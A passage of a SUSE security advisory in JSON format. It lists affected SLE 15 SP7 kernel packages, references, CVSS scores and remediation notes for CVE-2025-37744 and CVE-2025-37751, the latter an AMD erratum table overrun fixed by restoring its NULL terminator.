"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37744",
"url": "https://www.suse.com/security/cve/CVE-2025-37744"
},
{
"category": "external",
"summary": "SUSE Bug 1243662 for CVE-2025-37744",
"url": "https://bugzilla.suse.com/1243662"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2025-37744"
},
{
"cve": "CVE-2025-37751",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37751"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/cpu: Avoid running off the end of an AMD erratum table\n\nThe NULL array terminator at the end of erratum_1386_microcode was\nremoved during the switch from x86_cpu_desc to x86_cpu_id. This\ncauses readers to run off the end of the array.\n\nReplace the NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37751",
"url": "https://www.suse.com/security/cve/CVE-2025-37751"
},
{
"category": "external",
"summary": "SUSE Bug 1242505 for CVE-2025-37751",
"url": "https://bugzilla.suse.com/1242505"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
